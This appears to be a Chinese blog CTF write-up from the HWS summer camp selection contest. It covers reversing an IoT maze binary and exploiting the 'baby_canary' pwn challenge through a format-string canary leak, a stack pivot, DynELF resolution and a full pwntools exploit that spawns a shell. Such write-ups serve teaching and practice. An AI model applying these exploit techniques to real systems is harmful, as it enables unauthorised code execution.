

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=&#34;auto&#34;>



<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/favicon.png">
  <link rel="icon" type="image/png" href="/img/favicon.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="description" content>
  <meta name="author" content="chumen77">
  <meta name="keywords" content>
  <title>安恒HWS夏令营选拔赛部分题目 - Chumen77&#39;s Blog</title>

  <link rel="stylesheet" href="https://cdn.staticfile.org/twitter-bootstrap/4.4.1/css/bootstrap.min.css">


  <link rel="stylesheet" href="https://cdn.staticfile.org/github-markdown-css/4.0.0/github-markdown.min.css">
  <link rel="stylesheet" href="/lib/hint/hint.min.css">

  
    
    
      
      <link rel="stylesheet" href="https://cdn.staticfile.org/highlight.js/10.0.0/styles/atom-one-dark.min.css">
    
  

  


<!-- 主题依赖的图标库，不要自行修改 -->
<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_ba1fz6golrf.css">

<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_kmeydafke9r.css">

<link rel="stylesheet" href="/css/main.css">

<!-- 自定义样式保持在最底部 -->


  <script src="/js/utils.js"></script>
  <script src="/js/color-schema.js"></script>
</head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand"
       href="/">&nbsp;<strong>Chumen77's Blog</strong>&nbsp;</a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                首页
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                归档
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                标签
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                关于
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" data-toggle="modal" data-target="#modalSearch">&nbsp;<i
                class="iconfont icon-search"></i>&nbsp;</a>
          </li>
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" href="javascript:">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="banner intro-2" id="background" parallax=true
         style="background: url('/img/default.png') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="container page-header text-center fade-in-up">
            <span class="h2" id="subtitle">
              
            </span>

            
              <div class="mt-3">
  
  
    <span class="post-meta">
      <i class="iconfont icon-date-fill" aria-hidden="true"></i>
      <time datetime="2020-08-16 19:12" pubdate>
        2020年8月16日 晚上
      </time>
    </span>
  
</div>

<div class="mt-1">
  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      1.8k 字
    </span>
  

  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      26
       分钟
    </span>
  

  
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid">
  <div class="row">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-md">
      <div class="container nopadding-md" id="board-ctn">
        <div class="py-5" id="board">
          <article class="post-content mx-auto" id="post">
            <!-- SEO header -->
            <h1 style="display: none">安恒HWS夏令营选拔赛部分题目</h1>
            
            <div class="markdown-body" id="post-body">
              <h1 id="安恒HWS夏令营选拔赛部分题目"><a href="#安恒HWS夏令营选拔赛部分题目" class="headerlink" title="安恒HWS夏令营选拔赛部分题目"></a>安恒HWS夏令营选拔赛部分题目</h1><h2 id="RE"><a href="#RE" class="headerlink" title="RE"></a>RE</h2><h3 id="IOT1"><a href="#IOT1" class="headerlink" title="IOT1"></a>IOT1</h3><h4 id="环境搭建"><a href="#环境搭建" class="headerlink" title="环境搭建"></a>环境搭建</h4><p>参考：<br><a href="https://www.cnblogs.com/csnd/p/11800622.html" target="_blank" rel="noopener">https://www.cnblogs.com/csnd/p/11800622.html</a></p>
<p>注意网卡那块，要对应自己虚拟机网卡的情况。</p>
<h5 id="启动命令："><a href="#启动命令：" class="headerlink" title="启动命令："></a>启动命令：</h5><div class="hljs"><pre><code class="hljs python">qemu-system-mipsel -M malta -hda openwrt-malta-le-root.ext4 -kernel openwrt-malta-le-vmlinux.elf -nographic -append <span class="hljs-string">"root=/dev/sda console=tty50"</span>  -net nic -net tap</code></pre></div>

<h4 id="把虚拟机中要分析的maze文件取出来"><a href="#把虚拟机中要分析的maze文件取出来" class="headerlink" title="把虚拟机中要分析的maze文件取出来"></a>把虚拟机中要分析的maze文件取出来</h4><div class="hljs"><pre><code class="hljs bash">scp -r /path/maze username@servername:/path</code></pre></div>

<h4 id="使用ghidra进行分析"><a href="#使用ghidra进行分析" class="headerlink" title="使用ghidra进行分析"></a>使用ghidra进行分析</h4><div class="hljs"><pre><code class="hljs bash">fgets(buf,0x28,_stdin);
len = strlen(buf);
uStack68 = 0x20;
<span class="hljs-keyword">if</span> (*(char *)((int)&amp;uStack68 + len + 3) == <span class="hljs-string">'\n'</span>) &#123;
  *(undefined *)((int)&amp;uStack68 + len + 3) = 0;
  len = len - 1;
&#125;
<span class="hljs-keyword">if</span> (len != 0x20) &#123;
  eorr();
&#125;</code></pre></div>

<p>这一段可以确定让输入的是32个字符。</p>
<div class="hljs"><pre><code class="hljs c">
<span class="hljs-function"><span class="hljs-keyword">void</span> <span class="hljs-title">FUN_004006f0</span><span class="hljs-params">(<span class="hljs-keyword">void</span>)</span>

</span>&#123;
  <span class="hljs-keyword">int</span> i;
  <span class="hljs-keyword">int</span> j;
  
  i = <span class="hljs-number">0</span>;
  <span class="hljs-keyword">while</span> (i &lt; DAT_16) &#123;
    j = <span class="hljs-number">0</span>;
    <span class="hljs-keyword">while</span> (j &lt; <span class="hljs-number">8</span>) &#123;
      maze[i * <span class="hljs-number">8</span> + j] =
           (<span class="hljs-keyword">char</span>)(((<span class="hljs-keyword">int</span>)s_AMz1nG~#--Ma7e~_00411034[i] &amp; *(uint *)(&amp;DAT_00411044 + j * <span class="hljs-number">4</span>)) &gt;&gt;
                 (<span class="hljs-number">7U</span> - j &amp; <span class="hljs-number">0x1f</span>));
      j = j + <span class="hljs-number">1</span>;
    &#125;
    i = i + <span class="hljs-number">1</span>;
  &#125;
  <span class="hljs-keyword">return</span>;
&#125;</code></pre></div>

<p>可以看到迷宫是在运行时根据部分数据，来生成的。并且其中一行是8个数据，一列是16个，一共128个数据。</p>
<p>可以使用gdb，断点在这个函数之后，把迷宫提取出来。提取出来的都是0x1 和 0x0<br>组成的迷宫。</p>
<p>进入控制走位的函数：</p>
<div class="hljs"><pre><code class="hljs c">heng = <span class="hljs-number">1</span>;
shu = <span class="hljs-number">0</span>;
pcStackX0 = param_1</code></pre></div>

<p>这个地方控制说，起先起点是第1行的第2个位置。</p>
<p>check函数，主要是看你是不是在移动后，走到了0上，走到的话，程序就判你失败。</p>
<p>往下看，发现主要判断：</p>
<div class="hljs"><pre><code class="hljs c">          <span class="hljs-keyword">if</span> (cVar1 != <span class="hljs-string">'U'</span>) &#123;
LAB_00400ad4:
            <span class="hljs-keyword">if</span> ((heng == <span class="hljs-number">1</span>) &amp;&amp; (shu == <span class="hljs-number">10</span>)) &#123;
              uVar3 = <span class="hljs-number">1</span>;
            &#125;
            <span class="hljs-keyword">else</span> &#123;
              uVar3 = <span class="hljs-number">0</span>;
            &#125;</code></pre></div>

<p>在这一段，可以确定走到第11列的第2个数字即可。</p>
<h4 id="提取迷宫图并处理"><a href="#提取迷宫图并处理" class="headerlink" title="提取迷宫图并处理"></a>提取迷宫图并处理</h4><h5 id="脚本提取"><a href="#脚本提取" class="headerlink" title="脚本提取"></a>脚本提取</h5><div class="hljs"><pre><code class="hljs c">data=<span class="hljs-string">"AMz1nG~#--Ma7e~"</span>
data2=[<span class="hljs-number">0x80</span>,<span class="hljs-number">0x40</span>,<span class="hljs-number">0x20</span>,<span class="hljs-number">0x10</span>,<span class="hljs-number">0x8</span>,<span class="hljs-number">0x4</span>,<span class="hljs-number">0x2</span>,<span class="hljs-number">0x1</span>]
maze=[]
lie=<span class="hljs-number">0</span>
<span class="hljs-keyword">while</span> lie&lt;<span class="hljs-number">15</span>:
    hang=<span class="hljs-number">0</span>
    <span class="hljs-keyword">while</span> hang&lt;<span class="hljs-number">8</span>:
        # print(hex(ord(data[lie])&amp;data2[hang]),(<span class="hljs-number">7</span>-hang&amp;<span class="hljs-number">0x1f</span>))
        maze.append((ord(data[lie])&amp;data2[hang])&gt;&gt;(<span class="hljs-number">7</span>-hang&amp;<span class="hljs-number">0x1f</span>))
        hang+=<span class="hljs-number">1</span>
    lie+=<span class="hljs-number">1</span>
print(maze)</code></pre></div>

<p><img src="http://qiqianyun.chumen77.xyz/uPic/lAdA8H.png" srcset="/img/loading.gif" alt></p>
<p>就这迷宫，我看了好一会才能走好。🤣🤣服了自己，老以为是数据提取错了。</p>
<div class="hljs"><pre><code class="hljs bash">flag = md5&#123;DDRDDLDDRRRRRDRDDDDDLLDDLLLUUULU&#125;</code></pre></div>

<h2 id="PWN"><a href="#PWN" class="headerlink" title="PWN"></a>PWN</h2><h3 id="baby-canary"><a href="#baby-canary" class="headerlink" title="baby_canary_"></a><code>baby_canary_</code></h3><h4 id="分析"><a href="#分析" class="headerlink" title="分析"></a>分析</h4><h5 id="漏洞点"><a href="#漏洞点" class="headerlink" title="漏洞点"></a>漏洞点</h5><ul>
<li>格式化字符串漏洞，可以用来泄漏。</li>
<li>栈溢出，只能1个gadget。</li>
</ul>
<h5 id="难点"><a href="#难点" class="headerlink" title="难点"></a>难点</h5><h6 id="栈迁移"><a href="#栈迁移" class="headerlink" title="栈迁移"></a>栈迁移</h6><p>只能溢出一个gadget，肯定是打栈迁移，但是跟以往的栈迁移不同的是，这一个gadget只能溢出到rbp，并不能覆盖到ret address，所以只能覆盖好rbp后，利用程序走出这个函数后，将要结束程序时的<code>leave ret</code> 。</p>
<p>但是需要注意的是因为在走过一次 <code>leave ret</code>时，此时的rbp已经被改了，再过程序的第二个leave ret 前，需要过一下canary的检测:</p>
<div class="hljs"><pre><code class="hljs bash">[----------------------------------registers-----------------------------------]
RAX: 0x0
RBX: 0x0
RCX: 0x0
RDX: 0x38 (<span class="hljs-string">'8'</span>)
RSI: 0x7ffefee5e310 --&gt; 0x26c46b053d3e2f00
RDI: 0x0
RBP: 0x601198 --&gt; 0x26c46b053d3e2f00
RSP: 0x7ffefee5e350 --&gt; 0x7ffefee5e440 --&gt; 0x1
RIP: 0x4008de (mov    rdx,QWORD PTR [rbp-0x8])
R8 : 0x7f0bb0977700 (0x00007f0bb0977700)
R9 : 0x12
R10: 0x78 (<span class="hljs-string">'x'</span>)
R11: 0x246
R12: 0x400680 (xor    ebp,ebp)
R13: 0x7ffefee5e440 --&gt; 0x1
R14: 0x0
R15: 0x0
EFLAGS: 0x246 (carry PARITY adjust ZERO sign <span class="hljs-built_in">trap</span> INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x4008cf:    mov    eax,0x0
   0x4008d4:    call   0x4007de
   0x4008d9:    mov    eax,0x0
=&gt; 0x4008de:    mov    rdx,QWORD PTR [rbp-0x8]
   0x4008e2:    xor    rdx,QWORD PTR fs:0x28
   0x4008eb:    je     0x4008f2
   0x4008ed:    call   0x400600 &lt;__stack_chk_fail@plt&gt;</code></pre></div>

<p>看这里，在取数值时，其在你迁移的bss段读取数值到rdx进行判断的，所以在第一次往bss段读的时候，填充好canary的值。</p>
<p>并且这个题，在看got表到bss段的距离也是很近的。</p>
<p><img src="http://qiqianyun.chumen77.xyz/uPic/zbOm9Q.png" srcset="/img/loading.gif" alt></p>
<p>所以在迁移的时候需要注意，从有实际意义的函数（比如puts）开始前就得把栈抬高。否则在进入libc的内部调用函数时，会因为各种push pop 而修改到got处的东西，导致不仅泄漏的数值有问题，并且容易让程序崩掉。</p>
<div class="hljs"><pre><code class="hljs bash">payload = p64(canary)*(0x100/8)+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(pop_rdi)+p64(0)

s.sendafter(<span class="hljs-string">"canary ' s 5 0 n g :"</span>,payload)
payload = p64(canary)*6+p64(bss+0x100-8)
s.sendafter(<span class="hljs-string">"canary ' s h 0 m e :"</span>,payload)
s.recvline()
puts = u64(s.recv(6).ljust(8,<span class="hljs-string">'\x00'</span>))
success(hex(puts))
s.recvline()</code></pre></div>

<p>此处就可以泄漏出puts函数的libc地址，但是由于出题人想考察<code>ret2dl_runtime_resolve</code>,所以应该是魔改了libc。</p>
<p>然后可以使用DynELF来搞定，参考群里师傅分享的exp。</p>
<h6 id="Dynelf函数怎么写"><a href="#Dynelf函数怎么写" class="headerlink" title="Dynelf函数怎么写"></a>Dynelf函数怎么写</h6><p>由于程序只有puts函数来输出，就用puts函数来进行泄漏。</p>
<div class="hljs"><pre><code class="hljs python">payload = p64(<span class="hljs-number">0</span>) * <span class="hljs-number">57</span> +p64(canary) * <span class="hljs-number">2</span>  +p64(pop_rdi)+p64(address)+p64(puts_plt)+ p64(start_addr)</code></pre></div>

<p>本来我是这样写的，但是发现程序还是会崩，由于程序情况的限制，栈只能提高<code>0x1b0</code>这样，还是不够用。</p>
<p>还是就想办法提升栈，往高点的bss上写入rop进行想要的操作。</p>
<p>这个就在Dynelf前写好,用rop控制参数，调用read函数来往高点的bss段进行写payload，并且最后用pop rsp的操作，把写好rop chain的bss的地址pop 到rsp上，然后再ret上去：</p>
<div class="hljs"><pre><code class="hljs python">payload = p64(canary)*(<span class="hljs-number">0x100</span>/<span class="hljs-number">8</span>)+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(pop_rdi)+p64(<span class="hljs-number">0</span>)
payload += p64(pop_rsi_r15)+p64(bss+<span class="hljs-number">0x500</span>)+p64(<span class="hljs-number">0</span>)+p64(read_plt)+p64(pop_rsp_3)+p64(bss+<span class="hljs-number">0x500</span><span class="hljs-number">-8</span>*<span class="hljs-number">3</span>)+<span class="hljs-string">"/bin/sh\x00"</span>

s.sendafter(<span class="hljs-string">"canary ' s 5 0 n g :"</span>,payload)
payload = p64(canary)*<span class="hljs-number">6</span>+p64(bss+<span class="hljs-number">0x100</span><span class="hljs-number">-8</span>)
s.sendafter(<span class="hljs-string">"canary ' s h 0 m e :"</span>,payload)
s.recvline()</code></pre></div>

<p>接着就是用这写好好的rop chain，进行泄漏地址，为了Dynelf多次调用泄漏，在泄漏地址后，跟上read函数继续往这段地址上读取同样的rop chain，然后再次控制rsp，接着ret到对应的位置：</p>
<div class="hljs"><pre><code class="hljs python"><span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">vuln</span><span class="hljs-params">(address)</span>:</span>
    payload = p64(pop_rdi)+p64(address)+p64(puts_plt)+p64(pop_rdi)+p64(<span class="hljs-number">0</span>)
    payload += p64(pop_rsi_r15)+p64(bss+<span class="hljs-number">0x500</span>)+p64(<span class="hljs-number">0</span>) + \
                   p64(read_plt)+p64(pop_rsp_3)+p64(<span class="hljs-number">0x6015a0</span><span class="hljs-number">-8</span>*<span class="hljs-number">3</span>)
    s.recvline(timeout=<span class="hljs-number">0.07</span>)
    s.send(payload)
    count = <span class="hljs-number">0</span>
    up = <span class="hljs-string">""</span>
    buf = <span class="hljs-string">''</span>
    <span class="hljs-keyword">while</span> <span class="hljs-literal">True</span>:
        c = s.recv(numb=<span class="hljs-number">1</span>, timeout=<span class="hljs-number">0.07</span>)
        count += <span class="hljs-number">1</span>
        <span class="hljs-keyword">if</span> up == <span class="hljs-string">'\n'</span> <span class="hljs-keyword">and</span> c == <span class="hljs-string">""</span>:  
            buf = buf[:<span class="hljs-number">-1</span>]            
            buf += <span class="hljs-string">"\x00"</span>
            <span class="hljs-keyword">break</span>
        <span class="hljs-keyword">else</span>:
            buf += c
            up = c
    data = buf[:<span class="hljs-number">8</span>]
    log.debug(<span class="hljs-string">"%#x =&gt; %s"</span> % (address, (data <span class="hljs-keyword">or</span> <span class="hljs-string">''</span>).encode(<span class="hljs-string">'hex'</span>)))
    <span class="hljs-keyword">return</span> data</code></pre></div>

<p>可以看到是提高了0x500个字节的地方进行rop，做好用控制rsp，ret后进行反复横跳跃，完成对system 的寻找。感觉这是很好的办法，因为栈迁移的核心还是控制rsp，最初学习是见过2次栈迁移的题目，当时用的还是leave ret 来进行的控制，现在看到直接使用pop rsp 来控制，的确是方便又简单的办法。</p>
<h4 id="exp"><a href="#exp" class="headerlink" title="exp"></a>exp</h4><div class="hljs"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *
<span class="hljs-comment"># from LibcSearcher import *</span>
s = process(<span class="hljs-string">"./pwn"</span>)
<span class="hljs-comment"># s = remote("183.129.189.61",54900)</span>
libc = ELF(<span class="hljs-string">"/lib/x86_64-linux-gnu/libc-2.23.so"</span>)
elf = ELF(<span class="hljs-string">"./pwn"</span>)
context.log_level=<span class="hljs-string">'debug'</span>
<span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">debug</span><span class="hljs-params">()</span>:</span>
    <span class="hljs-comment"># gdb.attach(proc.pidof(s)[0],gdbscript='b main')</span>
    gdb.attach(s)
    pause()
pop_rdi = <span class="hljs-number">0x0000000000400963</span>
pop_rsi_r15 = <span class="hljs-number">0x0000000000400961</span>
pop_rsp_3 = <span class="hljs-number">0x000000000040095d</span>
leave_ret = <span class="hljs-number">0x00000000004007dc</span>
context.terminal = [<span class="hljs-string">'tmux'</span>,<span class="hljs-string">'neww'</span>]
puts_plt = elf.plt[<span class="hljs-string">'puts'</span>]
puts_got = elf.got[<span class="hljs-string">'puts'</span>]
read_plt = elf.plt[<span class="hljs-string">'read'</span>]
bss = <span class="hljs-number">0x6010a0</span>
s.sendafter(<span class="hljs-string">"canary ' s @ # $ % ^ &amp; * :\n"</span>, <span class="hljs-string">"%9$p"</span>)
canary = int(s.recvline(keepends=<span class="hljs-literal">False</span>), <span class="hljs-number">16</span>)
success(hex(canary))
context.arch = <span class="hljs-string">'amd64'</span>


<span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">vuln</span><span class="hljs-params">(address)</span>:</span>
    payload = p64(pop_rdi)+p64(address)+p64(puts_plt)+p64(pop_rdi)+p64(<span class="hljs-number">0</span>)
    payload += p64(pop_rsi_r15)+p64(bss+<span class="hljs-number">0x500</span>)+p64(<span class="hljs-number">0</span>) + \
                   p64(read_plt)+p64(pop_rsp_3)+p64(<span class="hljs-number">0x6015a0</span><span class="hljs-number">-8</span>*<span class="hljs-number">3</span>)
    s.recvline(timeout=<span class="hljs-number">0.07</span>)
    s.send(payload)
    count = <span class="hljs-number">0</span>
    up = <span class="hljs-string">""</span>
    buf = <span class="hljs-string">''</span>
    <span class="hljs-keyword">while</span> <span class="hljs-literal">True</span>:
        c = s.recv(numb=<span class="hljs-number">1</span>, timeout=<span class="hljs-number">0.07</span>)
        count += <span class="hljs-number">1</span>
        <span class="hljs-keyword">if</span> up == <span class="hljs-string">'\n'</span> <span class="hljs-keyword">and</span> c == <span class="hljs-string">""</span>:  
            buf = buf[:<span class="hljs-number">-1</span>]            
            buf += <span class="hljs-string">"\x00"</span>
            <span class="hljs-keyword">break</span>
        <span class="hljs-keyword">else</span>:
            buf += c
            up = c
    data = buf[:<span class="hljs-number">8</span>]
    log.debug(<span class="hljs-string">"%#x =&gt; %s"</span> % (address, (data <span class="hljs-keyword">or</span> <span class="hljs-string">''</span>).encode(<span class="hljs-string">'hex'</span>)))
    <span class="hljs-keyword">return</span> data
debug()
payload = p64(canary)*(<span class="hljs-number">0x100</span>/<span class="hljs-number">8</span>)+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(pop_rdi)+p64(<span class="hljs-number">0</span>)
payload += p64(pop_rsi_r15)+p64(bss+<span class="hljs-number">0x500</span>)+p64(<span class="hljs-number">0</span>)+p64(read_plt)+p64(pop_rsp_3)+p64(bss+<span class="hljs-number">0x500</span><span class="hljs-number">-8</span>*<span class="hljs-number">3</span>)+<span class="hljs-string">"/bin/sh\x00"</span>

s.sendafter(<span class="hljs-string">"canary ' s 5 0 n g :"</span>,payload)
payload = p64(canary)*<span class="hljs-number">6</span>+p64(bss+<span class="hljs-number">0x100</span><span class="hljs-number">-8</span>)
s.sendafter(<span class="hljs-string">"canary ' s h 0 m e :"</span>,payload)
s.recvline()

puts = u64(s.recv(<span class="hljs-number">6</span>).ljust(<span class="hljs-number">8</span>,<span class="hljs-string">'\x00'</span>))
success(hex(puts))
s.recvline()
d = DynELF(vuln,elf=elf)
system = d.lookup(<span class="hljs-string">'system'</span>,<span class="hljs-string">'libc'</span>)
success(hex(system))
payload = p64(pop_rdi)+p64(<span class="hljs-number">0x6010a0</span>+<span class="hljs-number">0x100</span>+<span class="hljs-number">8</span>*<span class="hljs-number">11</span>)+p64(system)
s.send(payload)
s.interactive()</code></pre></div>


            </div>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                
                  <div class="post-meta">
                    <i class="iconfont icon-tags"></i>
                    
                      <a class="hover-with-bg" href="/tags/re/">re</a>
                    
                      <a class="hover-with-bg" href="/tags/pwn/">pwn</a>
                    
                      <a class="hover-with-bg" href="/tags/IOT/">IOT</a>
                    
                  </div>
                
              </div>
              
                <p class="note note-warning">本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-sa/4.0/deed.zh" rel="nofollow noopener">CC BY-SA 4.0 协议</a> ，转载请注明出处！</p>
              
              
                <div class="post-prevnext row">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2020/08/20/ciscn 2020初赛部分题目/">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">ciscn 2020初赛部分题目</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2020/08/10/MacOS安装IDA插件keypatch/">
                        <span class="hidden-mobile">MacOS安装IDA插件keypatch</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;目录</p>
  <div id="tocbot"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    
  </main>

  
    <a id="scroll-top-button" href="#" role="button">
      <i class="iconfont icon-arrowup" aria-hidden="true"></i>
    </a>
  

  
    <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
  

  

  <footer class="text-center mt-5 py-3">
  <div class="footer-content">
     <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
  </div>
  
  <div class="statistics">
    
    

    
      
        <!-- LeanCloud 统计PV -->
        <span id="leancloud-site-pv-container" style="display: none">
            总访问量 
            <span id="leancloud-site-pv"></span>
             次
          </span>
      
      
        <!-- LeanCloud 统计UV -->
        <span id="leancloud-site-uv-container" style="display: none">
            总访客数 
            <span id="leancloud-site-uv"></span>
             人
          </span>
      

    
  </div>


  

  
</footer>

<!-- SCRIPTS -->
<script  src="https://cdn.staticfile.org/jquery/3.4.1/jquery.min.js" ></script>
<script  src="https://cdn.staticfile.org/twitter-bootstrap/4.4.1/js/bootstrap.min.js" ></script>
<script  src="/js/debouncer.js" ></script>
<script  src="/js/main.js" ></script>

<!-- Plugins -->


  
    <script  src="/js/lazyload.js" ></script>
  



  



  <script defer src="https://cdn.staticfile.org/clipboard.js/2.0.6/clipboard.min.js" ></script>
  <script  src="/js/clipboard-use.js" ></script>







  <script  src="https://cdn.staticfile.org/tocbot/4.11.1/tocbot.min.js" ></script>
  <script>
    $(document).ready(function () {
      var boardCtn = $('#board-ctn');
      var boardTop = boardCtn.offset().top;

      tocbot.init({
        tocSelector: '#tocbot',
        contentSelector: '#post-body',
        headingSelector: 'h1,h2,h3,h4,h5,h6',
        linkClass: 'tocbot-link',
        activeLinkClass: 'tocbot-active-link',
        listClass: 'tocbot-list',
        isCollapsedClass: 'tocbot-is-collapsed',
        collapsibleClass: 'tocbot-is-collapsible',
        collapseDepth: 0,
        scrollSmooth: true,
        headingsOffset: -boardTop
      });
      if ($('.toc-list-item').length > 0) {
        $('#toc').css('visibility', 'visible');
      }
    });
  </script>



  <script  src="https://cdn.staticfile.org/typed.js/2.0.11/typed.min.js" ></script>
  <script>
    var typed = new Typed('#subtitle', {
      strings: [
        '  ',
        "安恒HWS夏令营选拔赛部分题目&nbsp;",
      ],
      cursorChar: "_",
      typeSpeed: 70,
      loop: false,
    });
    typed.stop();
    $(document).ready(function () {
      $(".typed-cursor").addClass("h2");
      typed.start();
    });
  </script>



  <script  src="https://cdn.staticfile.org/anchor-js/4.2.2/anchor.min.js" ></script>
  <script>
    anchors.options = {
      placement: "left",
      visible: "hover",
      
      icon: "#"
      
    };
    var el = "h1,h2,h3,h4,h5,h6".split(",");
    var res = [];
    for (item of el) {
      res.push(".markdown-body > " + item)
    }
    anchors.add(res.join(", "))
  </script>



  <script  src="/js/local-search.js" ></script>
  <script>
    var path = "/local-search.xml";
    var inputArea = document.querySelector("#local-search-input");
    inputArea.onclick = function () {
      searchFunc(path, 'local-search-input', 'local-search-result');
      this.onclick = null
    }
  </script>



  <script  src="https://cdn.staticfile.org/fancybox/3.5.7/jquery.fancybox.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.staticfile.org/fancybox/3.5.7/jquery.fancybox.min.css" />

  <script>
    $('#post img:not(.no-zoom img, img[no-zoom]), img[zoom]').each(
      function () {
        var element = document.createElement('a');
        $(element).attr('data-fancybox', 'images');
        $(element).attr('href', $(this).attr('src'));
        $(this).wrap(element);
      }
    );
  </script>












  

  

  

  

  

  





</body>
</html>
